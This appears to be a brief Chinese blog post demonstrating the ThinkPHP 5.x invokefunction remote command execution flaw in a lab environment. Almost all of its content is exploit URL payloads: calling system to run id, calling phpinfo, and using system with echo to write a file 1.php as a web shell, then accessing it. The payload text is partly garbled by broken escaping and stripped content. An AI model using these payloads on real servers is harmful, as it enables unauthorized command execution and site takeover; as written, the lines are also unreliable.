Thinkphp5x远程命令执⾏及getshell

2301_815255182024-09-24 12:11

启动环境查看端口

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=id ![](https://i-blog.csdnimg.cn/direct/71c2408fcf614719986569264e20893f.png) ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/3035c9bc75d545d387ac0b0359d85963.png) ? s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1

\]=echo "\" \>\>1.php ![](https://i-blog.csdnimg.cn/direct/10d4fe0c722944ceaa489763ceab5209.png) 访问1.php ![](https://i-blog.csdnimg.cn/direct/fc7472516e4840998cb786e1cf50fc8a.png)

相关推荐
数字供应链安全产品选型1 天前
AI造“虾”易,治理难?悬镜多模态 SCA 技术破局 AI 数字供应链治理困局!
人工智能·安全·网络安全·ai-native
ALex_zry1 天前
gRPC服务熔断与限流设计
c++·安全·grpc
kang0x01 天前
Night Coder - Writeup by AI
安全
紫金桥软件1 天前
国产化 + 跨平台,紫金桥组态软件夯实新能源企业“自主底座”
安全·scada·组态软件·国产工业软件·监控组态软件
小快说网安1 天前
高防 IP 的 “防护上限”:带宽、清洗能力、防御类型如何匹配业务需求
网络·tcp/ip·安全
星幻元宇VR1 天前
VR旋转蛋椅:沉浸式安全科普新体验
科技·学习·安全·vr·虚拟现实
祭曦念1 天前
越权漏洞的克星!用爬虫自动化检测平行越权/垂直越权漏洞
爬虫·安全·自动化
╰つ栺尖篴夢ゞ1 天前
Web之深入解析Cookie的安全防御与跨域实践
前端·安全·存储·cookie·跨域
Never_Satisfied1 天前
安全属性标志详解:HTTPOnly
安全
无名的小三轮1 天前
nmap使用手册
安全
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Oh My Codex 快速使用指南07Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)08CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南09UV安装并设置国内源10Claude Code 未登录 使用第三方模型